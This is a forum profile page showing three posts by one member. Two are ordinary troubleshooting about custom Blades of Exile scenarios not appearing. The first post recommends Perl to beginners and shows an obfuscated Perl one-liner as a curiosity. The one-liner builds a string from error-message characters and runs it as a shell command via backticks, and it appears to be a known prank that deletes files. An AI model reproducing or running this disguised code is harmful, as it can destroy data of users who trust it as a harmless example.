Jump to content

novaalpha

Member
  • Posts

    7
  • Joined

  • Last visited

    Never

Posts posted by novaalpha

  1. I would recommend to start with perl. If you could master it, you'll be able to master every possible programming language there is, cuz it's both easy and hard, and you could use perl for:

     

    Code:
    $var = 1;@arr = ('I','am','array');sub func {print @_[0]}func($var);print 1;
    AND you could write things like this

     

    Code:
    `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@%)=($!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
  2. [somewhat solved]

     

    2 Celtic Minstrel:

     

    The files were directly in BOE\scenarios dir, like C:\Games\BOE\scenarios\goblins.exs , C:\Games\BOE\scenarios\goblins.BMP and yes, I have had restarted BOE a couple times after installing the files. The "Custom Scenario" button was still saying that there are none installed.

     

    2 Ishad Nha:

     

    Thank you very much. I had renamed goblins.exs & bmp to Stealth.* and now I'm eventually able to launch the game using the "Start Scenario" button.

    I'm pretty much O.K. with this solution, but heck, Exile III was IMNSHO perfect, and BOE is opensource, so the current devs could've made it better.

     

    Thanks anyway, I'll go exploring now smile

  3. Hi all.

     

    I've downloades some custom BOE scenarios from here: http://www.spiderwebsoftware.com/blades/scen_stuff/solid.html, and pre-compiled BOE from here: http://code.google.com/p/blades-of-exile/downloads/list

     

    Then I unzip archives and place .exs and .bmp files into C:\Games\BOE\scenarios\ (that's where BOE lives). But they don't appear when i press Custom Scenario button frown It says that there are no custom scenarios installed.

     

    Help ?

×
×
  • Create New...